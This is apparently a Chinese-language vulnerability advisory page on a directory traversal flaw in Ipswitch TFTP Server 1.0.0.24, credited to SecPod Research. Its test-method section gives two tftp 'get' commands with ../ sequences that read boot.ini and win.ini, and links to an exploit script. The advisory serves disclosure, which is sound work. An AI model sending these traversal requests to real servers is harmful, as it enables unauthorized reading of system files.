Ipswitch TFTP目录遍历漏洞

漏洞起因
输入验证错误
危险等级

影响系统
Ipswitch, Inc TFTP Server 1.0.0.24

不受影响系统

危害
远程攻击者利用漏洞获得敏感系统文件。

攻击所需条件
攻击者必须访问Ipswitch TFTP服务器。

漏洞信息
Ipswitch TFTP是一款TFTP服务程序。
Ipswitch TFTP服务器程序不正确过滤目录遍历序列字符,攻击者可以利用漏洞提交恶意请求获得系统敏感文件。

测试方法
tftp> get ../../../../../../../../../../../boot.ini
tftp> get ../../../../../../../../../../../windows/win.ini
http://www.securityfocus.com/data/vulnerabilities/exploits/50890.py

厂商解决方案
目前没有详细解决方案提供:
http://www.whatsupgold.com/free-software/network-tools/tftp-server.aspx

漏洞提供者
SecPod Research

发表评论?

0 条评论。

发表评论